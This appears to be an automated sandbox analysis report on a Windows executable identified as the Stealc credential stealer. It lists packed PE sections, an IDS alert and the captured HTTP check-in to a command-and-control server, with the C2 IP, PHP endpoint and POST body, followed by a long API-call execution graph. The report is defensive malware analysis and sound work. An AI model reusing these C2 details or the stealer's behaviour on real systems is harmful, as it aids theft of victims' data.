                      NameVirtual AddressVirtual Size Is in Section
                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IMPORT0x24b04d0x61.idata
                      IMAGE_DIRECTORY_ENTRY_RESOURCE0x24a0000x2b0.rsrc
                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x24b1f80x8.idata
                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                      Sections

                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                      0x10000x2490000x1620032b7da6f4b98ae7788bd471298ef9cc0unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .rsrc0x24a0000x2b00x20013ed861c59573d58e38d00fd6a740e7bFalse0.796875data6.003009286417348IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .idata 0x24b0000x10000x2000d0399d83a742d5d86c5718841e8e842False0.134765625data0.8646718654202081IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      0x24c0000x2a60000x200fc2fb46f39e6e9f88c3625184ecd90e5unknownunknownunknownunknownIMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      kzyuzjct0x4f20000x19c0000x19b600a7585b1cbc993442594498f37a045b15False0.9946100634305682data7.953368185260934IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      xpspqxsm0x68e0000x10000x4006761d65c5a80929301d337e333802bd4False0.71484375data5.66147292257423IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                      .taggant0x68f0000x30000x2200c6d6414363faa99890fb528c3fa547f7False0.061810661764705885DOS executable (COM)0.750944389184004IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                      Resources

                      NameRVASizeTypeLanguageCountryZLIB Complexity
                      RT_MANIFEST0x68d2b00x256ASCII text, with CRLF line terminators0.5100334448160535

                      Imports

                      DLLImport
                      kernel32.dlllstrcpy

                      Network Behavior

                      Suricata IDS Alerts

                      TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                      2024-11-24T11:33:32.820692+01002044243ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in1192.168.2.749704185.215.113.20680TCP

                      Network Port Distribution

                      TCP Packets

                      TimestampSource PortDest PortSource IPDest IP
                      Nov 24, 2024 11:33:30.894998074 CET4970480192.168.2.7185.215.113.206
                      Nov 24, 2024 11:33:31.014731884 CET8049704185.215.113.206192.168.2.7
                      Nov 24, 2024 11:33:31.014822960 CET4970480192.168.2.7185.215.113.206
                      Nov 24, 2024 11:33:31.032118082 CET4970480192.168.2.7185.215.113.206
                      Nov 24, 2024 11:33:31.151851892 CET8049704185.215.113.206192.168.2.7
                      Nov 24, 2024 11:33:32.364613056 CET8049704185.215.113.206192.168.2.7
                      Nov 24, 2024 11:33:32.364778996 CET4970480192.168.2.7185.215.113.206
                      Nov 24, 2024 11:33:32.367772102 CET4970480192.168.2.7185.215.113.206
                      Nov 24, 2024 11:33:32.487593889 CET8049704185.215.113.206192.168.2.7
                      Nov 24, 2024 11:33:32.817598104 CET8049704185.215.113.206192.168.2.7
                      Nov 24, 2024 11:33:32.820692062 CET4970480192.168.2.7185.215.113.206
                      Nov 24, 2024 11:33:37.822437048 CET8049704185.215.113.206192.168.2.7
                      Nov 24, 2024 11:33:37.822521925 CET4970480192.168.2.7185.215.113.206
                      Nov 24, 2024 11:33:38.025295019 CET4970480192.168.2.7185.215.113.206

                      HTTP Request Dependency Graph

                      • 185.215.113.206

                      HTTP Packets

                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                      0192.168.2.749704185.215.113.206807476C:\Users\user\Desktop\file.exe
                      TimestampBytes transferredDirectionData
                      Nov 24, 2024 11:33:31.032118082 CET90OUTGET / HTTP/1.1
                      Host: 185.215.113.206
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Nov 24, 2024 11:33:32.364613056 CET203INHTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 10:33:32 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 0
                      Keep-Alive: timeout=5, max=100
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Nov 24, 2024 11:33:32.367772102 CET413OUTPOST /c4becf79229cb002.php HTTP/1.1
                      Content-Type: multipart/form-data; boundary=----CBKFIECBGDHJKECAKFBG
                      Host: 185.215.113.206
                      Content-Length: 211
                      Connection: Keep-Alive
                      Cache-Control: no-cache
                      Data Raw: 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 32 44 46 39 41 46 42 33 31 30 36 30 33 38 31 30 32 38 39 34 34 38 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 6d 61 72 73 0d 0a 2d 2d 2d 2d 2d 2d 43 42 4b 46 49 45 43 42 47 44 48 4a 4b 45 43 41 4b 46 42 47 2d 2d 0d 0a
                      Data Ascii: ------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="hwid"2DF9AFB310603810289448------CBKFIECBGDHJKECAKFBGContent-Disposition: form-data; name="build"mars------CBKFIECBGDHJKECAKFBG--
                      Nov 24, 2024 11:33:32.817598104 CET210INHTTP/1.1 200 OK
                      Date: Sun, 24 Nov 2024 10:33:32 GMT
                      Server: Apache/2.4.41 (Ubuntu)
                      Content-Length: 8
                      Keep-Alive: timeout=5, max=99
                      Connection: Keep-Alive
                      Content-Type: text/html; charset=UTF-8
                      Data Raw: 59 6d 78 76 59 32 73 3d
                      Data Ascii: YmxvY2s=


                      Statistics

                      CPU Usage

                      Click to jump to process

                      Memory Usage

                      Click to jump to process

                      High Level Behavior Distribution

                      Click to dive into process behavior distribution

                      System Behavior

                      General

                      Target ID:0
                      Start time:05:33:24
                      Start date:24/11/2024
                      Path:C:\Users\user\Desktop\file.exe
                      Wow64 process (32bit):true
                      Commandline:"C:\Users\user\Desktop\file.exe"
                      Imagebase:0x900000
                      File size:1'790'976 bytes
                      MD5 hash:6AE8D6DBE0F7340866C08C3F7B65978A
                      Has elevated privileges:true
                      Has administrator privileges:true
                      Programmed in:C, C++ or other language
                      Yara matches:
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1518473176.00000000015ED000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000003.1430969378.00000000052E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                      • Rule: JoeSecurity_Stealc, Description: Yara detected Stealc, Source: 00000000.00000002.1517561899.0000000000901000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security
                      Reputation:low
                      Has exited:true

                      Disassembly

                      Reset < >

                        Execution Graph

                        Execution Coverage:5%
                        Dynamic/Decrypted Code Coverage:0%
                        Signature Coverage:16.7%
                        Total number of Nodes:1405
                        Total number of Limit Nodes:28
                        execution_graph 27142 922c10 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation wsprintfA 27156 924e35 8 API calls 27131 912499 290 API calls 27169 90db99 672 API calls 27170 918615 47 API calls 27132 92749e malloc ctype 27134 922880 10 API calls 27135 924480 OpenProcess GetModuleFileNameExA CloseHandle lstrcpy 27136 923480 6 API calls 27162 923280 7 API calls 27137 918c88 16 API calls 27178 90b309 98 API calls 27171 92938d 8 API calls 4 library calls 27157 923130 GetProcessHeap RtlAllocateHeap RegOpenKeyExA RegQueryValueExA RegCloseKey 27172 91abb2 120 API calls 27163 9016b9 200 API calls 27165 90f639 144 API calls 27181 90bf39 177 API calls 27138 9230a0 GetSystemPowerStatus 27153 9229a0 GetCurrentProcess IsWow64Process 27173 9123a9 298 API calls 27182 914b29 303 API calls 27145 922853 lstrcpy 27139 922cd0 GetUserDefaultLocaleName LocalAlloc CharToOemW 27154 9101d9 126 API calls 27159 913959 244 API calls 27140 923cc0 GetProcessHeap RtlAllocateHeap wsprintfA lstrcpy 27174 9233c0 GetProcessHeap RtlAllocateHeap GlobalMemoryStatusEx wsprintfA 27184 918615 49 API calls 27146 91e049 147 API calls 27175 918615 48 API calls 25694 921bf0 25746 902a90 25694->25746 25698 921c03 25699 921c29 lstrcpy 25698->25699 25700 921c35 25698->25700 25699->25700 25701 921c65 ExitProcess 25700->25701 25702 921c6d GetSystemInfo 25700->25702 25703 921c85 25702->25703 25704 921c7d ExitProcess 25702->25704 25847 901030 GetCurrentProcess VirtualAllocExNuma 25703->25847 25709 921ca2 25710 921cb8 25709->25710 25711 921cb0 ExitProcess 25709->25711 25859 922ad0 GetProcessHeap RtlAllocateHeap GetComputerNameA 25710->25859 25713 921ce7 lstrlen 25718 921cff 25713->25718 25714 921cbd 25714->25713 26068 922a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25714->26068 25716 921cd1 25716->25713 25721 921ce0 ExitProcess 25716->25721 25717 921d23 lstrlen 25719 921d39 25717->25719 25718->25717 25720 921d13 lstrcpy lstrcat 25718->25720 25722 921d5a 25719->25722 25723 921d46 lstrcpy lstrcat 25719->25723 25720->25717 25724 922ad0 3 API calls 25722->25724 25723->25722 25725 921d5f lstrlen 25724->25725 25728 921d74 25725->25728 25726 921d9a lstrlen 25727 921db0 25726->25727 25730 921dce 25727->25730 25731 921dba lstrcpy lstrcat 25727->25731 25728->25726 25729 921d87 lstrcpy lstrcat 25728->25729 25729->25726 25861 922a40 GetProcessHeap RtlAllocateHeap GetUserNameA 25730->25861 25731->25730 25733 921dd3 lstrlen 25734 921de7 25733->25734 25735 921df7 lstrcpy lstrcat 25734->25735 25736 921e0a 25734->25736 25735->25736 25737 921e28 lstrcpy 25736->25737 25738 921e30 25736->25738 25737->25738 25739 921e56 OpenEventA 25738->25739 25740 921e68 CloseHandle Sleep OpenEventA 25739->25740 25741 921e8c CreateEventA 25739->25741 25740->25740 25740->25741 25862 921b20 GetSystemTime 25741->25862 25745 921ea5 CloseHandle ExitProcess 26069 904a60 25746->26069 25748 902aa1 25749 904a60 2 API calls 25748->25749 25750 902ab7 25749->25750 25751 904a60 2 API calls 25750->25751 25752 902acd 25751->25752 25753 904a60 2 API calls 25752->25753 25754 902ae3 25753->25754 25755 904a60 2 API calls 25754->25755 25756 902af9 25755->25756 25757 904a60 2 API calls 25756->25757 25758 902b0f 25757->25758 25759 904a60 2 API calls 25758->25759 25760 902b28 25759->25760 25761 904a60 2 API calls 25760->25761 25762 902b3e 25761->25762 25763 904a60 2 API calls 25762->25763 25764 902b54 25763->25764 25765 904a60 2 API calls 25764->25765 25766 902b6a 25765->25766 25767 904a60 2 API calls 25766->25767 25768 902b80 25767->25768 25769 904a60 2 API calls 25768->25769 25770 902b96 25769->25770 25771 904a60 2 API calls 25770->25771 25772 902baf 25771->25772 25773 904a60 2 API calls 25772->25773 25774 902bc5 25773->25774 25775 904a60 2 API calls 25774->25775 25776 902bdb 25775->25776 25777 904a60 2 API calls 25776->25777 25778 902bf1 25777->25778 25779 904a60 2 API calls 25778->25779 25780 902c07 25779->25780 25781 904a60 2 API calls 25780->25781 25782 902c1d 25781->25782 25783 904a60 2 API calls 25782->25783 25784 902c36 25783->25784 25785 904a60 2 API calls 25784->25785 25786 902c4c 25785->25786 25787 904a60 2 API calls 25786->25787 25788 902c62 25787->25788 25789 904a60 2 API calls 25788->25789 25790 902c78 25789->25790 25791 904a60 2 API calls 25790->25791 25792 902c8e 25791->25792 25793 904a60 2 API calls 25792->25793 25794 902ca4 25793->25794 25795 904a60 2 API calls 25794->25795 25796 902cbd 25795->25796 25797 904a60 2 API calls 25796->25797 25798 902cd3 25797->25798 25799 904a60 2 API calls 25798->25799 25800 902ce9 25799->25800 25801 904a60 2 API calls 25800->25801 25802 902cff 25801->25802 25803 904a60 2 API calls 25802->25803 25804 902d15 25803->25804 25805 904a60 2 API calls 25804->25805 25806 902d2b 25805->25806 25807 904a60 2 API calls 25806->25807 25808 902d44 25807->25808 25809 904a60 2 API calls 25808->25809 25810 902d5a 25809->25810 25811 904a60 2 API calls 25810->25811 25812 902d70 25811->25812 25813 904a60 2 API calls 25812->25813 25814 902d86 25813->25814 25815 904a60 2 API calls 25814->25815 25816 902d9c 25815->25816 25817 904a60 2 API calls 25816->25817 25818 902db2 25817->25818 25819 904a60 2 API calls 25818->25819 25820 902dcb 25819->25820 25821 904a60 2 API calls 25820->25821 25822 902de1 25821->25822 25823 904a60 2 API calls 25822->25823 25824 902df7 25823->25824 25825 904a60 2 API calls 25824->25825 25826 902e0d 25825->25826 25827 904a60 2 API calls 25826->25827 25828 902e23 25827->25828 25829 904a60 2 API calls 25828->25829 25830 902e39 25829->25830 25831 904a60 2 API calls 25830->25831 25832 902e52 25831->25832 25833 926390 GetPEB 25832->25833 25834 9265c3 LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA LoadLibraryA 25833->25834 25835 9263c3 25833->25835 25836 926625 GetProcAddress 25834->25836 25837 926638 25834->25837 25842 9263d7 20 API calls 25835->25842 25836->25837 25838 926641 GetProcAddress GetProcAddress 25837->25838 25839 92666c 25837->25839 25838->25839 25840 926675 GetProcAddress 25839->25840 25841 926688 25839->25841 25840->25841 25843 926691 GetProcAddress 25841->25843 25844 9266a4 25841->25844 25842->25834 25843->25844 25845 9266d7 25844->25845 25846 9266ad GetProcAddress GetProcAddress 25844->25846 25845->25698 25846->25845 25848 901057 ExitProcess 25847->25848 25849 90105e VirtualAlloc 25847->25849 25850 90107d 25849->25850 25851 9010b1 25850->25851 25852 90108a VirtualFree 25850->25852 25853 9010c0 25851->25853 25852->25851 25854 9010d0 GlobalMemoryStatusEx 25853->25854 25856 901112 ExitProcess 25854->25856 25858 9010f5 25854->25858 25857 90111a GetUserDefaultLangID 25857->25709 25857->25710 25858->25856 25858->25857 25860 922b24 25859->25860 25860->25714 25861->25733 26074 921820 25862->26074 25864 921b81 sscanf 26113 902a20 25864->26113 25867 921bd6 25868 921be9 25867->25868 25869 921be2 ExitProcess 25867->25869 25870 91ffd0 25868->25870 25871 91ffe0 25870->25871 25872 920019 lstrlen 25871->25872 25873 92000d lstrcpy 25871->25873 25874 9200d0 25872->25874 25873->25872 25875 9200e7 lstrlen 25874->25875 25876 9200db lstrcpy 25874->25876 25877 9200ff 25875->25877 25876->25875 25878 920116 lstrlen 25877->25878 25879 92010a lstrcpy 25877->25879 25880 92012e 25878->25880 25879->25878 25881 920145 25880->25881 25882 920139 lstrcpy 25880->25882 26115 921570 25881->26115 25882->25881 25885 92016e 25886 920183 lstrcpy 25885->25886 25887 92018f lstrlen 25885->25887 25886->25887 25888 9201a8 25887->25888 25889 9201c9 lstrlen 25888->25889 25890 9201bd lstrcpy 25888->25890 25891 9201e8 25889->25891 25890->25889 25892 920200 lstrcpy 25891->25892 25893 92020c lstrlen 25891->25893 25892->25893 25894 92026a 25893->25894 25895 920282 lstrcpy 25894->25895 25896 92028e 25894->25896 25895->25896 26125 902e70 25896->26125 25904 920540 25905 921570 4 API calls 25904->25905 25906 92054f 25905->25906 25907 9205a1 lstrlen 25906->25907 25908 920599 lstrcpy 25906->25908 25909 9205bf 25907->25909 25908->25907 25910 9205d1 lstrcpy lstrcat 25909->25910 25911 9205e9 25909->25911 25910->25911 25912 920614 25911->25912 25913 92060c lstrcpy 25911->25913 25914 92061b lstrlen 25912->25914 25913->25912 25915 920636 25914->25915 25916 92064a lstrcpy lstrcat 25915->25916 25917 920662 25915->25917 25916->25917 25918 920687 25917->25918 25919 92067f lstrcpy 25917->25919 25920 92068e lstrlen 25918->25920 25919->25918 25921 9206b3 25920->25921 25922 9206c7 lstrcpy lstrcat 25921->25922 25923 9206db 25921->25923 25922->25923 25924 920704 lstrcpy 25923->25924 25925 92070c 25923->25925 25924->25925 25926 920751 25925->25926 25927 920749 lstrcpy 25925->25927 26881 922740 GetWindowsDirectoryA 25926->26881 25927->25926 25929 920785 26890 904c50 25929->26890 25930 92075d 25930->25929 25931 92077d lstrcpy 25930->25931 25931->25929 25933 92078f 27044 918ca0 StrCmpCA 25933->27044 25935 92079b 25936 901530 8 API calls 25935->25936 25937 9207bc 25936->25937 25938 9207e5 lstrcpy 25937->25938 25939 9207ed 25937->25939 25938->25939 27062 9060d0 80 API calls 25939->27062 25941 9207fa 27063 9181b0 10 API calls 25941->27063 25943 920809 25944 901530 8 API calls 25943->25944 25945 92082f 25944->25945 25946 920856 lstrcpy 25945->25946 25947 92085e 25945->25947 25946->25947 27064 9060d0 80 API calls 25947->27064 25949 92086b 27065 917ee0 lstrlen lstrcpy StrCmpCA StrCmpCA StrCmpCA 25949->27065 25951 920876 25952 901530 8 API calls 25951->25952 25953 9208a1 25952->25953 25954 9208d5 25953->25954 25955 9208c9 lstrcpy 25953->25955 27066 9060d0 80 API calls 25954->27066 25955->25954 25957 9208db 27067 918050 lstrlen lstrcpy StrCmpCA lstrlen lstrcpy 25957->27067 25959 9208e6 25960 901530 8 API calls 25959->25960 25961 9208f7 25960->25961 25962 920926 lstrcpy 25961->25962 25963 92092e 25961->25963 25962->25963 27068 905640 8 API calls 25963->27068 25965 920933 25966 901530 8 API calls 25965->25966 25967 92094c 25966->25967 27069 917280 1498 API calls 25967->27069 25969 92099f 25970 901530 8 API calls 25969->25970 25971 9209cf 25970->25971 25972 9209f6 lstrcpy 25971->25972 25973 9209fe 25971->25973 25972->25973 27070 9060d0 80 API calls 25973->27070 25975 920a0b 27071 9183e0 7 API calls 25975->27071 25977 920a18 25978 901530 8 API calls 25977->25978 25979 920a29 25978->25979 27072 9024e0 230 API calls 25979->27072 25981 920a6b 25982 920b40 25981->25982 25983 920a7f 25981->25983 25985 901530 8 API calls 25982->25985 25984 901530 8 API calls 25983->25984 25986 920aa5 25984->25986 25988 920b59 25985->25988 25989 920ad4 25986->25989 25990 920acc lstrcpy 25986->25990 25987 920b87 27076 9060d0 80 API calls 25987->27076 25988->25987 25991 920b7f lstrcpy 25988->25991 27073 9060d0 80 API calls 25989->27073 25990->25989 25991->25987 25994 920b8d 27077 91c840 70 API calls 25994->27077 25995 920ada 27074 9185b0 47 API calls 25995->27074 25998 920b38 26001 920bd1 25998->26001 26004 901530 8 API calls 25998->26004 25999 920ae5 26000 901530 8 API calls 25999->26000 26003 920af6 26000->26003 26002 920bfa 26001->26002 26005 901530 8 API calls 26001->26005 26006 920c23 26002->26006 26010 901530 8 API calls 26002->26010 27075 91d0f0 118 API calls 26003->27075 26008 920bb9 26004->26008 26009 920bf5 26005->26009 26012 920c4c 26006->26012 26013 901530 8 API calls 26006->26013 27078 91d7b0 103 API calls __call_reportfault 26008->27078 27080 91dfa0 149 API calls 26009->27080 26016 920c1e 26010->26016 26014 920c75 26012->26014 26019 901530 8 API calls 26012->26019 26018 920c47 26013->26018 26020 920c9e 26014->26020 26026 901530 8 API calls 26014->26026 27081 91e500 108 API calls 26016->27081 26017 920bbe 26022 901530 8 API calls 26017->26022 27082 91e720 120 API calls 26018->27082 26025 920c70 26019->26025 26023 920cc7 26020->26023 26029 901530 8 API calls 26020->26029 26027 920bcc 26022->26027 26030 920cf0 26023->26030 26034 901530 8 API calls 26023->26034 27083 91e9e0 110 API calls 26025->27083 26032 920c99 26026->26032 27079 91ecb0 98 API calls 26027->27079 26033 920cc2 26029->26033 26035 920d04 26030->26035 26036 920dca 26030->26036 27084 907bc0 154 API calls 26032->27084 27085 91eb70 108 API calls 26033->27085 26040 920ceb 26034->26040 26041 901530 8 API calls 26035->26041 26038 901530 8 API calls 26036->26038 26045 920de3 26038->26045 27086 9241e0 91 API calls 26040->27086 26043 920d2a 26041->26043 26046 920d56 lstrcpy 26043->26046 26047 920d5e 26043->26047 26044 920e11 27090 9060d0 80 API calls 26044->27090 26045->26044 26048 920e09 lstrcpy 26045->26048 26046->26047 27087 9060d0 80 API calls 26047->27087 26048->26044 26051 920e17 27091 91c840 70 API calls 26051->27091 26052 920d64 27088 9185b0 47 API calls 26052->27088 26055 920dc2 26058 901530 8 API calls 26055->26058 26056 920d6f 26057 901530 8 API calls 26056->26057 26059 920d80 26057->26059 26062 920e39 26058->26062 27089 91d0f0 118 API calls 26059->27089 26061 920e67 27092 9060d0 80 API calls 26061->27092 26062->26061 26063 920e5f lstrcpy 26062->26063 26063->26061 26065 920e74 26067 920e95 26065->26067 27093 921660 12 API calls 26065->27093 26067->25745 26068->25716 26070 904a76 RtlAllocateHeap 26069->26070 26073 904ab4 VirtualProtect 26070->26073 26073->25748 26075 92182e 26074->26075 26076 921855 lstrlen 26075->26076 26077 921849 lstrcpy 26075->26077 26078 921873 26076->26078 26077->26076 26079 921885 lstrcpy lstrcat 26078->26079 26080 921898 26078->26080 26079->26080 26081 9218c7 26080->26081 26082 9218bf lstrcpy 26080->26082 26083 9218ce lstrlen 26081->26083 26082->26081 26084 9218e6 26083->26084 26085 9218f2 lstrcpy lstrcat 26084->26085 26086 921906 26084->26086 26085->26086 26087 921935 26086->26087 26088 92192d lstrcpy 26086->26088 26089 92193c lstrlen 26087->26089 26088->26087 26090 921958 26089->26090 26091 92196a lstrcpy lstrcat 26090->26091 26092 92197d 26090->26092 26091->26092 26093 9219ac 26092->26093 26094 9219a4 lstrcpy 26092->26094 26095 9219b3 lstrlen 26093->26095 26094->26093 26096 9219cb 26095->26096 26097 9219d7 lstrcpy lstrcat 26096->26097 26098 9219eb 26096->26098 26097->26098 26099 921a1a 26098->26099 26100 921a12 lstrcpy 26098->26100 26101 921a21 lstrlen 26099->26101 26100->26099 26102 921a3d 26101->26102 26103 921a4f lstrcpy lstrcat 26102->26103 26104 921a62 26102->26104 26103->26104 26105 921a91 26104->26105 26106 921a89 lstrcpy 26104->26106 26107 921a98 lstrlen 26105->26107 26106->26105 26108 921ab4 26107->26108 26109 921ac6 lstrcpy lstrcat 26108->26109 26110 921ad9 26108->26110 26109->26110 26111 921b08 26110->26111 26112 921b00 lstrcpy 26110->26112 26111->25864 26112->26111 26114 902a24 SystemTimeToFileTime SystemTimeToFileTime 26113->26114 26114->25867 26114->25868 26116 92157f 26115->26116 26117 92159f lstrcpy 26116->26117 26118 9215a7 26116->26118 26117->26118 26119 9215d7 lstrcpy 26118->26119 26120 9215df 26118->26120 26119->26120 26121 92160f lstrcpy 26120->26121 26122 921617 26120->26122 26121->26122 26123 920155 lstrlen 26122->26123 26124 921647 lstrcpy 26122->26124 26123->25885 26124->26123 26126 904a60 2 API calls 26125->26126 26127 902e82 26126->26127 26128 904a60 2 API calls 26127->26128 26129 902ea0 26128->26129 26130 904a60 2 API calls 26129->26130 26131 902eb6 26130->26131 26132 904a60 2 API calls 26131->26132 26133 902ecb 26132->26133 26134 904a60 2 API calls 26133->26134 26135 902eec 26134->26135 26136 904a60 2 API calls 26135->26136 26137 902f01 26136->26137 26138 904a60 2 API calls 26137->26138 26139 902f19 26138->26139 26140 904a60 2 API calls 26139->26140 26141 902f3a 26140->26141 26142 904a60 2 API calls 26141->26142 26143 902f4f 26142->26143 26144 904a60 2 API calls 26143->26144 26145 902f65 26144->26145 26146 904a60 2 API calls 26145->26146 26147 902f7b 26146->26147 26148 904a60 2 API calls 26147->26148 26149 902f91 26148->26149 26150 904a60 2 API calls 26149->26150 26151 902faa 26150->26151 26152 904a60 2 API calls 26151->26152 26153 902fc0 26152->26153 26154 904a60 2 API calls 26153->26154 26155 902fd6 26154->26155 26156 904a60 2 API calls 26155->26156 26157 902fec 26156->26157 26158 904a60 2 API calls 26157->26158 26159 903002 26158->26159 26160 904a60 2 API calls 26159->26160 26161 903018 26160->26161 26162 904a60 2 API calls 26161->26162 26163 903031 26162->26163 26164 904a60 2 API calls 26163->26164 26165 903047 26164->26165 26166 904a60 2 API calls 26165->26166 26167 90305d 26166->26167 26168 904a60 2 API calls 26167->26168 26169 903073 26168->26169 26170 904a60 2 API calls 26169->26170 26171 903089 26170->26171 26172 904a60 2 API calls 26171->26172 26173 90309f 26172->26173 26174 904a60 2 API calls 26173->26174 26175 9030b8 26174->26175 26176 904a60 2 API calls 26175->26176 26177 9030ce 26176->26177 26178 904a60 2 API calls 26177->26178 26179 9030e4 26178->26179 26180 904a60 2 API calls 26179->26180 26181 9030fa 26180->26181 26182 904a60 2 API calls 26181->26182 26183 903110 26182->26183 26184 904a60 2 API calls 26183->26184 26185 903126 26184->26185 26186 904a60 2 API calls 26185->26186 26187 90313f 26186->26187 26188 904a60 2 API calls 26187->26188 26189 903155 26188->26189 26190 904a60 2 API calls 26189->26190 26191 90316b 26190->26191 26192 904a60 2 API calls 26191->26192 26193 903181 26192->26193 26194 904a60 2 API calls 26193->26194 26195 903197 26194->26195 26196 904a60 2 API calls 26195->26196 26197 9031ad 26196->26197 26198 904a60 2 API calls 26197->26198 26199 9031c6 26198->26199 26200 904a60 2 API calls 26199->26200 26201 9031dc 26200->26201 26202 904a60 2 API calls 26201->26202 26203 9031f2 26202->26203 26204 904a60 2 API calls 26203->26204 26205 903208 26204->26205 26206 904a60 2 API calls 26205->26206 26207 90321e 26206->26207 26208 904a60 2 API calls 26207->26208 26209 903234 26208->26209 26210 904a60 2 API calls 26209->26210 26211 90324d 26210->26211 26212 904a60 2 API calls 26211->26212 26213 903263 26212->26213 26214 904a60 2 API calls 26213->26214 26215 903279 26214->26215 26216 904a60 2 API calls 26215->26216 26217 90328f 26216->26217 26218 904a60 2 API calls 26217->26218 26219 9032a5 26218->26219 26220 904a60 2 API calls 26219->26220 26221 9032bb 26220->26221 26222 904a60 2 API calls 26221->26222 26223 9032d4 26222->26223 26224 904a60 2 API calls 26223->26224 26225 9032ea 26224->26225 26226 904a60 2 API calls 26225->26226 26227 903300 26226->26227 26228 904a60 2 API calls 26227->26228 26229 903316 26228->26229 26230 904a60 2 API calls 26229->26230 26231 90332c 26230->26231 26232 904a60 2 API calls 26231->26232 26233 903342 26232->26233 26234 904a60 2 API calls 26233->26234 26235 90335b 26234->26235 26236 904a60 2 API calls 26235->26236 26237 903371 26236->26237 26238 904a60 2 API calls 26237->26238 26239 903387 26238->26239 26240 904a60 2 API calls 26239->26240 26241 90339d 26240->26241 26242 904a60 2 API calls 26241->26242 26243 9033b3 26242->26243 26244 904a60 2 API calls 26243->26244 26245 9033c9 26244->26245 26246 904a60 2 API calls 26245->26246 26247 9033e2 26246->26247 26248 904a60 2 API calls 26247->26248 26249 9033f8 26248->26249 26250 904a60 2 API calls 26249->26250 26251 90340e 26250->26251 26252 904a60 2 API calls 26251->26252 26253 903424 26252->26253 26254 904a60 2 API calls 26253->26254 26255 90343a 26254->26255 26256 904a60 2 API calls 26255->26256 26257 903450 26256->26257 26258 904a60 2 API calls 26257->26258 26259 903469 26258->26259 26260 904a60 2 API calls 26259->26260 26261 90347f 26260->26261 26262 904a60 2 API calls 26261->26262 26263 903495 26262->26263 26264 904a60 2 API calls 26263->26264 26265 9034ab 26264->26265 26266 904a60 2 API calls 26265->26266 26267 9034c1 26266->26267 26268 904a60 2 API calls 26267->26268 26269 9034d7 26268->26269 26270 904a60 2 API calls 26269->26270 26271 9034f0 26270->26271 26272 904a60 2 API calls 26271->26272 26273 903506 26272->26273 26274 904a60 2 API calls 26273->26274 26275 90351c 26274->26275 26276 904a60 2 API calls 26275->26276 26277 903532 26276->26277 26278 904a60 2 API calls 26277->26278 26279 903548 26278->26279 26280 904a60 2 API calls 26279->26280 26281 90355e 26280->26281 26282 904a60 2 API calls 26281->26282 26283 903577 26282->26283 26284 904a60 2 API calls 26283->26284 26285 90358d 26284->26285 26286 904a60 2 API calls 26285->26286 26287 9035a3 26286->26287 26288 904a60 2 API calls 26287->26288 26289 9035b9 26288->26289 26290 904a60 2 API calls 26289->26290 26291 9035cf 26290->26291 26292 904a60 2 API calls 26291->26292 26293 9035e5 26292->26293 26294 904a60 2 API calls 26293->26294 26295 9035fe 26294->26295 26296 904a60 2 API calls 26295->26296 26297 903614 